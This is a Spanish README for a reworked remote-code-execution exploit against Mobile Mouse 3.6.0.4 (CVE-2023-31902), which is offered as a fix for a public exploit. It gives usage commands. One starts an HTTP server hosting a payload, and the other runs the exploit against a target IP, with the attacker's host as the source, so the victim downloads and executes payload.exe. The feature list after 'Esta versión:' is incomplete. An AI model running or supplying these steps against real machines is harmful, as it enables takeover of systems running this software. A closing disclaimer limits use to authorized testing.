
Mobile Mouse 3.6.0.4 - Ejecución Remota de Código - CVE-2023-31902
Una versión corregida del exploit de ejecución remota de código de Mobile Mouse 3.6.0.4 publicado como EDB-51010.
El exploit original descarga correctamente el payload, pero puede fallar al ejecutarlo porque ambas etapas usan la misma conexión TCP.
Esta versión:
También usa sendall(), rutas de Windows correctamente escapadas, timeouts de socket y manejo básico de errores.
Inicie un servidor HTTP en el directorio del payload:
python3 -m http.server 8080
Ejecute el exploit:
python3 exploit.py \
--target 192.168.1.50 \
--lhost 192.168.1.10 \
--file payload.exe
Este proyecto está destinado únicamente a pruebas de seguridad autorizadas e investigación educativa. No lo utilice contra sistemas sin permiso explícito.